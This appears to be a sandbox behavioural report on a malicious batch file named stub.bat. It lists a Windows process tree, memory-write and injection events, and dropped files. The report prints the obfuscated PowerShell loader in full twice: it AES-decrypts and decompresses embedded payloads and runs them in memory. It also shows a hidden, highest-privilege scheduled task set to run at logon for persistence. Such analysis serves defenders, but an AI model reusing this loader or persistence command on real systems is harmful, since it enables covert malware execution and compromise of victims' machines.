svchost.exe PID 3908 wrote to memory of 1948 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 956 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1740 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1936 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1340 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1732 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 2704 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1124 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 924 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1116 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1700 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1696 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 904 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1100 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1288 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 2576 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 3048 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 2256 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 2640 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1456 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1060 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1256 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 2240 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 4384 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1144 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 2628 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1836 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 2812 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1628 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1428 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1624 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 2804 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1580 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 4964 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1992 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 2552 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 2748 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 3536 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 1392 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 800 3908 powershell.exe svchost.exe PID 3908 wrote to memory of 3352 3908 powershell.exe svchost.exe PID 800 wrote to memory of 4980 800 svchost.exe BackgroundTransferHost.exe PID 800 wrote to memory of 4980 800 svchost.exe BackgroundTransferHost.exe
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.12⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca2⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding2⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding2⤵
-
C:\Windows\system32\BackgroundTaskHost.exe"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider2⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding2⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.12⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.12⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.12⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca2⤵
-
C:\Windows\system32\BackgroundTaskHost.exe"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider2⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
- Modifies Internet Explorer settings
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4f8 0x32c2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
- Modifies firewall policy service
- Modifies security service
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\stub.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wFHZlpcUkL8mgXVyBku7iyaIiR3uArGUIdDRouRIrZ4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QOY4Cv+wyXX2do7aiffgdQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jlrYc=New-Object System.IO.MemoryStream(,$param_var); $bmDYr=New-Object System.IO.MemoryStream; $QKSMF=New-Object System.IO.Compression.GZipStream($jlrYc, [IO.Compression.CompressionMode]::Decompress); $QKSMF.CopyTo($bmDYr); $QKSMF.Dispose(); $jlrYc.Dispose(); $bmDYr.Dispose(); $bmDYr.ToArray();}function execute_function($param_var,$param2_var){ $IMXEX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oyYtu=$IMXEX.EntryPoint; $oyYtu.Invoke($null, $param2_var);}$hhBxF = 'C:\Users\Admin\AppData\Local\Temp\stub.bat';$host.UI.RawUI.WindowTitle = $hhBxF;$fGGWD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($hhBxF).Split([Environment]::NewLine);foreach ($jTXro in $fGGWD) { if ($jTXro.StartsWith('vjpcDvZGGpfgJCuMbyNz')) { $pwxWX=$jTXro.Substring(20); break; }}$payloads_var=[string[]]$pwxWX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_986_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wFHZlpcUkL8mgXVyBku7iyaIiR3uArGUIdDRouRIrZ4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QOY4Cv+wyXX2do7aiffgdQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jlrYc=New-Object System.IO.MemoryStream(,$param_var); $bmDYr=New-Object System.IO.MemoryStream; $QKSMF=New-Object System.IO.Compression.GZipStream($jlrYc, [IO.Compression.CompressionMode]::Decompress); $QKSMF.CopyTo($bmDYr); $QKSMF.Dispose(); $jlrYc.Dispose(); $bmDYr.Dispose(); $bmDYr.ToArray();}function execute_function($param_var,$param2_var){ $IMXEX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oyYtu=$IMXEX.EntryPoint; $oyYtu.Invoke($null, $param2_var);}$hhBxF = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.bat';$host.UI.RawUI.WindowTitle = $hhBxF;$fGGWD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($hhBxF).Split([Environment]::NewLine);foreach ($jTXro in $fGGWD) { if ($jTXro.StartsWith('vjpcDvZGGpfgJCuMbyNz')) { $pwxWX=$jTXro.Substring(20); break; }}$payloads_var=[string[]]$pwxWX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp77D0.tmp.bat7⤵
-
C:\Windows\system32\chcp.comchcp 650018⤵
-
C:\Windows\system32\taskkill.exeTaskKill /F /IM 39088⤵
- Kills process with taskkill
-
C:\Windows\system32\timeout.exeTimeout /T 2 /Nobreak8⤵
- Delays execution with timeout.exe
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9e5a446f8,0x7ff9e5a44708,0x7ff9e5a447183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4352 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3432 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3432 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5868 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5880 /prefetch:83⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5816 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1556,15466691446976485049,4249617701301740181,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:13⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
